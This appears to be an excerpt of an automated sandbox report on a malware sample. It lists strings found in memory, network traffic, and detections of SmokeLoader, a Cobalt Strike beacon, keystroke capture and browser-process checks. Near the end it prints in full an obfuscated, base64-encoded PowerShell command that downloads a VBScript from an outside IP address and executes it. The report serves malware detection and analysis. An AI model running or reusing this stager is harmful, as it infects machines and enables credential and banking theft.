Source: powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000000E.00000000.2144420450.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3010837612.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2145335102.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1934299085.0000000004967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000002.3025073202.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 27_2_02D5162B GetKeyboardState,ToUnicode,

27_2_02D5162B

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\SysWOW64\explorer.exe	Code function: StrStrIA, chrome.exe\|opera.exe\|msedge.exe	20_2_03042EA8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe	20_2_03043862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe	20_2_03043862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe	20_2_03043862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe	20_2_03043862

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
